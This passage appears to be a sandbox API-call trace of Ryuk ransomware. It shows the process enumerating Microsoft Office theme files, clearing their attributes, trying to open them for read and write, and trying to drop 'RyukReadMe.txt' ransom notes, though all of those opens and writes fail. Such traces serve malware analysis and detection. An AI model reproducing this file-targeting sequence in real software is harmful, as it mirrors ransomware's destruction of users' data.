FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.591] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.591] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx", dwFileAttributes=0x80) returned 0 [0135.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.591] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.591] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.591] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.591] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.592] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx", dwFileAttributes=0x80) returned 0 [0135.592] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\trek.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.592] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.592] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.592] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.592] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.592] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx", dwFileAttributes=0x80) returned 0 [0135.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\urban.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.593] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.593] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.593] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.593] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.593] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx", dwFileAttributes=0x80) returned 0 [0135.594] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\verve.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.594] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.594] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.594] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.594] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.594] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx", dwFileAttributes=0x80) returned 0 [0135.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.595] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.595] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.595] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0135.595] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0135.596] SetLastError (dwErrCode=0x0) [0135.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.599] GetLastError () returned 0x5 [0135.599] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0135.599] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.599] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.599] SetLastError (dwErrCode=0x0) [0135.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.599] GetLastError () returned 0x5 [0135.599] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0135.599] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.599] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0135.600] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.601] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.601] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.601] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Adjacency.xml", dwFileAttributes=0x80) returned 0 [0135.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Adjacency.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\adjacency.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.602] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.602] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.602] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.602] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.602] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Angles.xml", dwFileAttributes=0x80) returned 0 [0135.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Angles.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\angles.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.602] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.602] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.603] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.603] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.603] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apex.xml", dwFileAttributes=0x80) returned 0 [0135.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apex.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\apex.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.603] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.603] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.603] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.603] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.603] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apothecary.xml", dwFileAttributes=0x80) returned 0 [0135.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apothecary.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\apothecary.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.603] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.604] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.604] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.604] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.604] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Aspect.xml", dwFileAttributes=0x80) returned 0 [0135.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Aspect.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\aspect.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.604] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.604] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.604] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.604] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.604] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Austin.xml", dwFileAttributes=0x80) returned 0 [0135.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Austin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\austin.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.605] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.605] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.605] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.605] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.605] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Black Tie.xml", dwFileAttributes=0x80) returned 0 [0135.606] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Black Tie.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\black tie.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.606] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.606] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.606] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.606] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.606] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Civic.xml", dwFileAttributes=0x80) returned 0 [0135.607] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Civic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\civic.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.607] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.607] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.607] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.607] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.607] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Clarity.xml", dwFileAttributes=0x80) returned 0 [0135.607] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Clarity.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\clarity.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.607] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.607] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.607] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.608] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.608] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Composite.xml", dwFileAttributes=0x80) returned 0 [0135.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Composite.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\composite.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.608] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.608] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.608] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.608] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.608] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Concourse.xml", dwFileAttributes=0x80) returned 0 [0135.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Concourse.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\concourse.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.609] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.609] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.609] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.609] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.609] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Couture.xml", dwFileAttributes=0x80) returned 0 [0135.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Couture.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\couture.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.610] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.610] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.610] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.610] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.610] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Elemental.xml", dwFileAttributes=0x80) returned 0 [0135.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Elemental.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\elemental.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.610] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.610] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.611] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.611] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.611] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Equity.xml", dwFileAttributes=0x80) returned 0 [0135.611] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Equity.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\equity.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.611] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.611] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.611] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.611] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.611] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Essential.xml", dwFileAttributes=0x80) returned 0 [0135.611] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Essential.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\essential.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.612] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.612] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.612] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.612] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.612] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Executive.xml", dwFileAttributes=0x80) returned 0 [0135.612] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Executive.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\executive.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.612] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.612] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.612] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.612] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.612] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Flow.xml", dwFileAttributes=0x80) returned 0 [0135.613] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Flow.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\flow.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.613] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.613] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.613] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.613] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.613] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Foundry.xml", dwFileAttributes=0x80) returned 0 [0135.620] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Foundry.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\foundry.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.620] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.620] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.620] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.620] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.621] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Grid.xml", dwFileAttributes=0x80) returned 0 [0135.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Grid.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\grid.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.621] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.621] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.621] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.621] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.622] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Hardcover.xml", dwFileAttributes=0x80) returned 0 [0135.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Hardcover.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\hardcover.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.622] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.622] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.622] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.622] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.622] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Horizon.xml", dwFileAttributes=0x80) returned 0 [0135.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Horizon.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\horizon.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.622] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.622] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.623] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.623] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.623] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Median.xml", dwFileAttributes=0x80) returned 0 [0135.623] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Median.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\median.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.623] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.623] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.623] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.623] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.623] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Metro.xml", dwFileAttributes=0x80) returned 0 